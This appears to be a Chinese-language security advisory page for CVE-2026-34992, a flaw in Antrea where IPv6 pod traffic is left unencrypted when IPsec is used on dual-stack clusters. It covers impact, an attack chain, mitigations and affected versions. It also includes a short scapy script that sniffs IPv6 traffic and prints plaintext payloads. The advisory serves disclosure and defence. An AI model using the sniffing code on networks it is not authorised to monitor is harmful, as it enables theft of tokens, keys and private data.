CVE-2026-34992 CVSS 7.5 高危

CVE-2026-34992 Antrea IPv6流量明文传输漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34992

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Antrea

漏洞概述

Antrea是Kubernetes原生网络解决方案。在启用IPsec加密的双栈网络模式下，低于2.4.5和2.5.2的版本存在漏洞。虽然IPv4流量被正确加密，但IPv6 Pod流量未加密，以明文形式传输。此问题导致敏感数据泄露风险，仅影响配置了双栈网络且开启IPsec加密的用户。

技术细节

该漏洞源于Antrea在处理双栈网络流量时的逻辑缺陷。当Antrea集群配置了双栈网络并启用IPsec加密时，系统会对IPv4流量应用ESP加密，但未能对IPv6流量执行同样的操作。具体而言，IPv6数据包虽然经过了Geneve或VXLAN封装，但在传输过程中绕过了IPsec加密层。这意味着攻击者如果能够嗅探节点间的网络流量，即可直接读取IPv6 Pod的通信内容，获取敏感信息。该漏洞不影响单栈IPv4或IPv6集群，且已在后续版本中修复。

攻击链分析

STEP 1

侦察

攻击者识别出运行受影响版本Antrea的Kubernetes集群，并确认其配置了双栈网络。

STEP 2

流量拦截

攻击者获得网络访问权限，在集群节点间的网络链路上进行嗅探或中间人攻击。

STEP 3

数据解密

攻击者捕获IPv6 Pod间的通信流量，发现流量未经过IPsec加密，可直接读取明文内容。

STEP 4

信息泄露

攻击者分析捕获的数据包，提取敏感信息（如密钥、令牌或应用数据）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import scapy.all as scapy

def capture_ipv6_traffic(interface):
    # Sniff IPv6 packets to demonstrate plaintext transmission
    print(f"[*] Sniffing on {interface} for IPv6 traffic...")
    scapy.sniff(iface=interface, filter="ip6", prn=process_packet, store=0)

def process_packet(packet):
    if packet.haslayer(scapy.IPv6) and packet.haslayer(scapy.Raw):
        print(f"[+] Captured IPv6 Packet: {packet[scapy.IPv6].src} -> {packet[scapy.IPv6].dst}")
        print(f"[+] Payload (Plaintext): {packet[scapy.Raw].load}")

if __name__ == "__main__":
    # Usage: python3 poc.py <interface>
    import sys
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <network_interface>")
    else:
        capture_ipv6_traffic(sys.argv[1])

影响范围

Antrea < 2.4.5

Antrea 2.5.0 - 2.5.1

防御指南

临时缓解措施

若无法立即升级，建议暂时禁用双栈网络配置，仅使用单栈IPv4网络，直到完成补丁更新。同时，加强网络分段和访问控制，限制对节点间网络的嗅探能力。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表